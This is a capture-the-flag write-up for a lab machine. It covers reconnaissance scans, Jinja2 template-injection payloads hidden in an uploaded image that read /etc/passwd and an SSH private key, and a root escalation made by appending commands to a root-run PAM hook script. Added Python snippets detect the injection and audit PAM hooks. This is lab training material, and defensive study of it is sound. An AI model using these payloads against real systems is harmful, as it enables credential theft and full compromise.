1. IP Address

# Machine Address
10.10.11.156

# Local Address
10.10.14.44

2. Nmap & Nikto

nmap

nmap -sC -sV -oA nmap/late 10.10.11.156
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 22:28 EDT
Nmap scan report for 10.10.11.156
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.86 seconds

Nikto

nikto -h 10.10.11.156
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.11.156
+ Target Hostname:    10.10.11.156
+ Target Port:        80
+ Start Time:         2022-07-14 22:29:34 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

3. Feroxbuster & ffuf

feroxbuster -u http://late.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://late.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301        7l       13w      194c http://late.htb/assets
301        7l       13w      194c http://late.htb/assets/css
301        7l       13w      194c http://late.htb/assets/images
301        7l       13w      194c http://late.htb/assets/js
301        7l       13w      194c http://late.htb/assets/fonts
[####################] - 2m    179994/179994  0s      found:5       errors:0      
[####################] - 2m     29999/29999   204/s   http://late.htb
[####################] - 2m     29999/29999   205/s   http://late.htb/assets
[####################] - 2m     29999/29999   205/s   http://late.htb/assets/css
[####################] - 2m     29999/29999   205/s   http://late.htb/assets/images
[####################] - 2m     29999/29999   205/s   http://late.htb/assets/js
[####################] - 2m     29999/29999   205/s   http://late.htb/assets/fonts

ffuf

ffuf -c -u http://late.htb/ -H "Host: FUZZ.late.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 9461
       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://late.htb/
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.late.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 9461
________________________________________________

images                  [Status: 200, Size: 2187, Words: 448, Lines: 64]
:: Progress: [4989/4989] :: Job [1/1] :: 169 req/sec :: Duration: [0:00:30] :: Errors: 0 ::

4. Burp

POST /scanner HTTP/1.1
Host: images.late.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------260872003713748502303208156715
Content-Length: 33052
Origin: http://images.late.htb
DNT: 1
Connection: close
Referer: http://images.late.htb/
Upgrade-Insecure-Requests: 1

-----------------------------260872003713748502303208156715
Content-Disposition: form-data; name="file"; filename="Screenshot_2022-07-15 Image Reader.png"
Content-Type: image/png

‰PNG


-----------------------------260872003713748502303208156715--

Using https://cloudconvert.com/txt-to-jpg, dump passwd by putting the following in a txt file:


{{(''.__class__).__mro__[1].__subclasses__()[249]("cat /etc/passwd", stdout=-1, shell=True).communicate() }}

Converting the txt to jpg and uploading it gives result.txt:

<p>(b&#39;root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\npollinate:x:109:1::/var/cache/pollinate:/bin/false\nsshd:x:110:65534::/run/sshd:/usr/sbin/nologin\nsvc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash\nrtkit:x:111:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\nusbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\navahi:x:113:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\ncups-pk-helper:x:114:117:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin\nsaned:x:115:119::/var/lib/saned:/usr/sbin/nologin\ncolord:x:116:120:colord colour 
management daemon,,,:/var/lib/colord:/usr/sbin/nologin\npulse:x:117:121:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\ngeoclue:x:118:123::/var/lib/geoclue:/usr/sbin/nologin\nsmmta:x:119:124:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin\nsmmsp:x:120:125:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin\n&#39;, None)
</p>

svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash

Getting SSH access as svc_acc

{{(''.__class__).__mro__[1].__subclasses__()[249]("cat ~/.ssh/id_rsa", stdout=-1, shell=True).communicate() }}

id_rsa

-----BEGIN RSA PRIVATE KEY-----
MIIEp*****************
-----END RSA PRIVATE KEY-----

user.txt

550e06****************
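The Image Reader evidently passes the text it extracts from the image to a Python template engine as template source (the payloads above are Jinja2 syntax), so the braces run as code, and escaping the result afterwards (the `&#39;` in result.txt) comes too late. As an added example that is not part of the writeup, a stdlib-only pre-render check: it flags template delimiters and the dunder-attribute walk used in the two payloads, and renders OCR'd text via html.escape() instead of a template engine. The function names and the benign sample text are assumptions.

```python
"""Added example, not from the writeup: a pre-render check for OCR'd text.
The Image Reader evidently uses the text it extracts as template source, so
the braces in the uploaded image run as code; HTML-escaping the result after
the fact (the &#39; in result.txt) is too late. Both pieces are stdlib-only:
detect_template_injection() flags the patterns for logging/alerting, and
render_ocr_result() treats the text strictly as data. Names are assumed."""
import html
import re

# Jinja2 expression, statement and comment delimiters.
_TEMPLATE_DELIMS = re.compile(r"\{\{|\}\}|\{%|%\}|\{#|#\}")
# The attribute walk from a str object up to os/subprocess used in the payloads.
_DUNDER_WALK = re.compile(r"__(?:class|mro|subclasses|globals|builtins|import)__")
# Process-spawning call shapes seen once a suitable subclass has been reached.
_SPAWN_HINT = re.compile(r"shell\s*=\s*True|\.communicate\(|os\.system|popen", re.I)

def detect_template_injection(text: str) -> list[str]:
    """Return the indicators found in untrusted text; an empty list means clean."""
    found = []
    for name, pattern in (("template-delimiter", _TEMPLATE_DELIMS),
                          ("dunder-attribute-walk", _DUNDER_WALK),
                          ("process-spawn-hint", _SPAWN_HINT)):
        if pattern.search(text):
            found.append(name)
    return found

def render_ocr_result(text: str) -> str:
    """Build the <p>...</p> response by escaping, never by rendering the text."""
    return "<p>{}</p>".format(html.escape(text, quote=True))

# The writeup's payload and a constructed benign OCR result, for the demo.
WRITEUP_PAYLOAD = ("{{(''.__class__).__mro__[1].__subclasses__()[249]"
                   "(\"cat /etc/passwd\", stdout=-1, shell=True).communicate() }}")
BENIGN_OCR = "Invoice #1042 - total due: 42.00 EUR"

if __name__ == "__main__":
    for sample in (WRITEUP_PAYLOAD, BENIGN_OCR):
        print(detect_template_injection(sample) or "clean", "->", render_ocr_result(sample))
```

Run the detector on the request body or the OCR output before anything is rendered; a hit is worth an alert even when the render path is already safe.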

5. Privilege escalation

Running pspy and reading its output shows:

svc_acc@late:/usr/local/sbin$ cat ssh-alert.sh 
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi

lsattr shows the a (append-only) attribute, so content can be appended to this file with echo.

svc_acc@late:/usr/local/sbin$ lsattr ssh-alert.sh 
-----a--------e--- ssh-alert.sh

Create a txt file in tmp containing:

cat /root/root.txt >> /home/svc_acc/flag.txt

Append it to ssh-alert:

cat /tmp/haha.txt >> /usr/local/sbin/ssh-alert.sh

To trigger ssh-alert.sh, log out of svc_acc and log back in with id_rsa. root.txt is then in flag.txt.

root.txt

63195a4*********
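The PAM_USER/PAM_TYPE variables show that ssh-alert.sh is started by pam_exec on every SSH session, so anyone who can write to it (appending counts) gets code run as root at the next login. As an added example that is not part of the writeup, a stand-alone audit: it parses a pam.d directory for pam_exec.so lines and reports hook scripts that are not root-owned or are group/world-writable. The /etc/pam.d default, the function names and the fixture are assumptions; chattr's append-only flag is not in the mode bits, so it still has to be checked with lsattr.

```python
"""Added example (not from the writeup): find pam_exec hook scripts under a pam.d
directory and report those not root-owned or group/world-writable. Assumes the
conventional /etc/pam.d layout; chattr's +a flag is not in mode bits (use lsattr)."""
import os
import re
import stat
import tempfile
from pathlib import Path

_PAM_EXEC = re.compile(r"pam_exec\.so\b(?P<rest>.*)")

def pam_exec_hooks(pam_dir: str = "/etc/pam.d") -> set[str]:
    """Scripts invoked via pam_exec.so: the first absolute path after the module."""
    hooks = set()
    for svc in (p for p in Path(pam_dir).iterdir() if p.is_file()):
        for line in svc.read_text(errors="replace").splitlines():
            m = _PAM_EXEC.search(line.split("#", 1)[0])  # comments stripped
            if m:
                script = next((t for t in m.group("rest").split() if t[:1] == "/"), None)
                if script:
                    hooks.add(script)
    return hooks

def hook_findings(path: str) -> list[str]:
    """Reasons a hook script is unsafe to run as root; empty list means it looks fine."""
    if not os.path.exists(path):
        return ["missing-script"]
    st = os.stat(path)
    checks = (("not-root-owned", st.st_uid != 0),
              ("group-writable", st.st_mode & stat.S_IWGRP),
              ("world-writable", st.st_mode & stat.S_IWOTH))
    return [name for name, hit in checks if hit]

def audit_pam_exec(pam_dir: str = "/etc/pam.d") -> dict[str, list[str]]:
    """Map every pam_exec hook script under pam_dir to its findings."""
    return {h: hook_findings(h) for h in sorted(pam_exec_hooks(pam_dir))}

def build_demo_pam_dir() -> str:
    """Constructed fixture, not the box's real config: one sloppy hook, one sane one."""
    base = Path(tempfile.mkdtemp())
    (base / "pam.d").mkdir()
    bad, good = base / "ssh-alert.sh", base / "audit.sh"
    for script, mode in ((bad, 0o646), (good, 0o755)):
        script.write_text("#!/bin/bash\n")
        script.chmod(mode)
    (base / "pam.d" / "sshd").write_text(f"session optional pam_exec.so seteuid {bad}\n"
                                        f"session optional pam_exec.so {good}\n")
    return str(base / "pam.d")
```

On a real host call audit_pam_exec() with no argument; any hook with findings should be root-owned, mode 0755 or tighter, and live in a directory the service account cannot write to.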